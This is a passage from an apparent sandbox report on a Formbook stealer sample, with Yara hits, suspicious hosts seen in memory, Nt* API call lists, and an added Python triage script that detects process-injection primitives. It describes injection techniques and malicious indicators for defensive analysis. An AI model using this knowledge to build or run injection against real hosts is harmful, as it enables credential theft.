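    "Source: subst.exe, 00000004.00000003.2149963450.0000000007BAD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=",
    "Source: subst.exe, 00000004.00000002.4163884021.0000000003AE4000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2253264572.000000002B8C4000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://f385xw.com/register",
]
SAMPLE_YARA_DUMPS = [
    "1.2.svchost.exe.400000.0.unpack",
    "00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp",
    "00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp",
]
```

The MEM_MAPPED versus MEM_IMAGE distinction is the one to carry to a live host: a section mapped with NtMapViewOfSection reports MEM_MAPPED, a module brought in by the loader reports MEM_IMAGE, so an executable MEM_MAPPED or MEM_PRIVATE region holding a PE header is worth dumping regardless of what Yara says about it. The "review" verdict on the remaining hosts (cdn.jqueryscdns.net, f385xw.com, the alicdn, baidu and uc.cn assets) is deliberate: every dump they appear in above is non-executable, so they may be page content the stealer read, and the report alone does not establish that the sample contacted them.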

            System Summary

            Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4163255466.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4162187382.0000000000830000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1967957948.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1968363208.00000000038D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000004.00000002.4162478682.0000000002BE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000001.00000002.1968884330.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: 00000003.00000002.4163300871.00000000045E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A3B4C: This is a third-party compiled AutoIt script.
            Source: 7RsDGpyOQk.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
            Source: 7RsDGpyOQk.exe, 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_f85d8368-d
            Source: 7RsDGpyOQk.exe, 00000000.00000002.1701486056.0000000000255000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_401808e5-2
            Source: 7RsDGpyOQk.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_75391cc7-3
            Source: 7RsDGpyOQk.exe | String found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_be0999c3-3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042AF63 NtClose
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B735C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B74340 NtSetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B74650 NtSuspendThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72BA0 NtEnumerateValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72BF0 NtAllocateVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72BE0 NtQueryValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72AF0 NtWriteFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72AD0 NtReadFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72FB0 NtResumeThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72FE0 NtCreateFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72F30 NtCreateSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72E80 NtReadVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72EE0 NtQueueApcThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72DD0 NtDelayExecution
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72D30 NtUnmapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72D10 NtMapViewOfSection
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72CA0 NtQueryInformationToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B72C60 NtCreateKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B73090 NtSetValueKey
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B73010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B739B0 NtGetContextThread
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B73D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B73D70 NtOpenThread
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03144340 NtSetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03144650 NtSuspendThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142B60 NtClose,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142BA0 NtEnumerateValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142BF0 NtAllocateVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142BE0 NtQueryValueKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142AD0 NtReadFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142AF0 NtWriteFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142F30 NtCreateSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142FB0 NtResumeThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142FE0 NtCreateFile,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142E80 NtReadVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142EE0 NtQueueApcThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142D10 NtMapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142D30 NtUnmapViewOfSection,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142DD0 NtDelayExecution,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142DF0 NtQuerySystemInformation,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142C70 NtFreeVirtualMemory,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142C60 NtCreateKey,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142CA0 NtQueryInformationToken,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_031435C0 NtCreateMutant,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_031439B0 NtGetContextThread,LdrInitializeThunk
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142B80 NtQueryInformationFile
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142AB0 NtWaitForSingleObject
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142F60 NtCreateProcessEx
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142F90 NtProtectVirtualMemory
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142FA0 NtQuerySection
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142E30 NtWriteVirtualMemory
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142EA0 NtAdjustPrivilegesToken
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142D00 NtSetInformationFile
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142DB0 NtEnumerateKey
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142C00 NtQueryInformationProcess
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142CC0 NtQueryVirtualMemory
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03142CF0 NtOpenProcess
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03143010 NtOpenDirectoryObject
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03143090 NtSetValueKey
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03143D10 NtOpenProcessToken
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_03143D70 NtOpenThread
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_00857AC0 NtCreateFile
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_00857C20 NtReadFile
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_00857DB0 NtClose
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_00857D10 NtDeleteFile
            Source: C:\Windows\SysWOW64\subst.exe | Code function: 4_2_00857F00 NtAllocateVirtualMemory
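Added example, not part of the report and not Joe Sandbox's code: the Nt* list above is long but repetitive, and the script below turns it into the conclusions a reader wants from it. It groups the calls per process, checks which complete injection primitive sets are present (the sets are this example's own definitions, an assumption) and clusters the calling stubs by 64 KiB region. Run over the full list above, all four sets are complete in both svchost.exe and subst.exe, which matches the report's section-mapping, APC and thread-context signatures, and nearly every Nt* stub in svchost.exe falls in the 0x03B7xxxx region and in subst.exe in 0x0314xxxx, each listed next to LdrInitializeThunk, with a second, smaller cluster at 0x0042xxxx and 0x0085xxxx near the base addresses of the Yara-hit regions (0x400000 and 0x830000). The dense cluster is what to compare against the process's loaded-module list before reading these as ordinary ntdll calls; the report's "Found direct / indirect Syscall" signature points the same way. The embedded sample is a constructed subset of those lines.

```python
"""Added triage example; not code from the Joe Sandbox report.

Groups the Nt* calls listed per process, checks which complete injection
primitive sets are present, and clusters the calling stubs by 64 KiB region.
The primitive sets below are this example's own definitions (an assumption),
not Joe Sandbox's signature logic.
"""
from __future__ import annotations

import re
from collections import defaultdict

CODE_RE = re.compile(
    r"Source:\s*(?P<path>.+?\.exe)\s*\|?\s*Code function:\s*"
    r"\d+_\d+_(?P<addr>[0-9A-F]+):?\s*(?P<calls>\S*)")

# Assumed primitive sets: every API in a set must be present to count.
PRIMITIVES = {
    "section mapping into another process":
        {"NtCreateSection", "NtMapViewOfSection", "NtUnmapViewOfSection"},
    "APC injection":
        {"NtOpenThread", "NtQueueApcThread", "NtResumeThread"},
    "thread-context hijack":
        {"NtGetContextThread", "NtSetContextThread", "NtSuspendThread",
         "NtResumeThread"},
    "remote memory write":
        {"NtOpenProcess", "NtAllocateVirtualMemory", "NtWriteVirtualMemory",
         "NtProtectVirtualMemory"},
}


def parse_code_lines(text: str) -> dict[str, dict[str, int]]:
    """Map image name -> {Nt*/Zw* API: address of the first stub calling it}.

    Accepts both the fused form ('svchost.exeCode function:') and a spaced
    one, and ignores the trailing repeat of the function id and non-Nt
    callees such as LdrInitializeThunk.
    """
    calls: dict[str, dict[str, int]] = defaultdict(dict)
    for m in CODE_RE.finditer(text):
        proc = m["path"].rsplit("\\", 1)[-1]
        addr = int(m["addr"], 16)
        for name in m["calls"].split(","):
            if name.startswith(("Nt", "Zw")):
                calls[proc].setdefault(name, addr)
    return dict(calls)


def injection_primitives(calls: dict[str, dict[str, int]]) -> dict[str, list[str]]:
    """Per process, the primitive sets whose APIs are all present."""
    return {proc: [label for label, need in PRIMITIVES.items() if need.issubset(apis)]
            for proc, apis in calls.items()}


def stub_regions(calls: dict[str, dict[str, int]]) -> dict[str, dict[int, list[str]]]:
    """Per process, Nt* stubs grouped by 64 KiB region (address >> 16).

    One dense cluster holding almost every Nt* entry point is the shape of a
    privately mapped ntdll copy or a syscall-stub table; compare the region
    against the process's loaded-module list before treating the calls as
    ordinary ntdll imports.
    """
    regions: dict[str, dict[int, list[str]]] = defaultdict(lambda: defaultdict(list))
    for proc, apis in calls.items():
        for name, addr in apis.items():
            regions[proc][addr >> 16].append(name)
    return {proc: dict(r) for proc, r in regions.items()}


# Constructed sample: a subset of the 'Code function' lines in the report.
SAMPLE = r"""
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03B72F30 NtCreateSection,1_2_03B72F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03B72D10 NtMapViewOfSection,1_2_03B72D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03B72D30 NtUnmapViewOfSection,1_2_03B72D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03B73D70 NtOpenThread,1_2_03B73D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03B72EE0 NtQueueApcThread,1_2_03B72EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 1_2_03B72FB0 NtResumeThread,1_2_03B72FB0
Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0042AF63 NtClose,1_2_0042AF63
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03144340 NtSetContextThread,LdrInitializeThunk,4_2_03144340
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_031439B0 NtGetContextThread,LdrInitializeThunk,4_2_031439B0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03144650 NtSuspendThread,LdrInitializeThunk,4_2_03144650
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_03142FB0 NtResumeThread,LdrInitializeThunk,4_2_03142FB0
Source: C:\Windows\SysWOW64\subst.exe Code function: 4_2_00857AC0 NtCreateFile,4_2_00857AC0
"""

if __name__ == "__main__":
    parsed = parse_code_lines(SAMPLE)
    for proc, labels in injection_primitives(parsed).items():
        print(proc, "->", ", ".join(labels) or "no complete primitive set")
    for proc, regions in stub_regions(parsed).items():
        for region, names in sorted(regions.items()):
            print(f"{proc} region 0x{region:04X}xxxx: {len(names)} Nt* stubs")
```

On the embedded subset the script reports section mapping and APC injection for svchost.exe and a thread-context hijack for subst.exe; feed it the whole list above and every set completes for both processes. Requiring a complete set rather than any single API keeps NtCreateFile or NtClose, which every process calls, from raising the score on their own.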
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00204021 CreateFileW,DeviceIoControl,CloseHandle
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001F8858 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0020545F ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001AE800
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CDBB5
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_0022804A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001AE060
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001B4140
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C2405
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D6522
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00220665
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D267E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C283A
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001B6843
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D89DF
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001B8A0E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D6A94
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00220AE2
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001FEB07
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_00208B13
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CCD61
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D7006
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001B710E
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001B3190
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001A1287
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C33C7
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CF419
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001B5680
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C16C4
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C78D3
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001B58C0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C1BB8
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001D9D05
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001AFE40
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001C1FD0
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_001CBFE6
            Source: C:\Users\user\Desktop\7RsDGpyOQk.exe | Code function: 0_2_034D35E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402150
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004011D0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FB53
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0042D393
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004164C1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004164C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040FD73
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040DDF3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00402F20
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C003E6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC02C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF41A2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C001AA
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF81CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30100
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BC8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BD2000
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3C7C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40770
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B64750
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5C6E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C00591
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40535
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEE4F6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE4420
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF2446
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF6BD7
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFAB40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3EA80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B429A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0A9A6
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B56962
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B268B8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B6E8F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4A840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B42840
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BBEFA0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B32FC8
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B60F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE2F30
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B82F28
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB4F40
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B52E90
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFCE93
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFEEDB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFEE26
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40E59
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B58DBF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B3ADE0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDCD1F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4AD00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE0CB5
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B30CF2
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B40C00
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B8739A
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF132D
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2D34C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B452A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5D2F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BE12ED
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5B2C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B4B1B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03C0B16B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B2F172
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7516C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF70E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF0E0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BEF0CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B470C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF7B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF16CC
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B85630
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BDD5B0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BF7571
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFF43F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B31460
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B5FB80
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BB5BF0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03B7DBF9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03BFFB76
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BDDAAC1_2_03BDDAAC
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03B85AA01_2_03B85AA0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BE1AA31_2_03BE1AA3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BEDAC61_2_03BEDAC6
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BB3A6C1_2_03BB3A6C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BFFA491_2_03BFFA49
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BF7A461_2_03BF7A46
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03BD59101_2_03BD5910
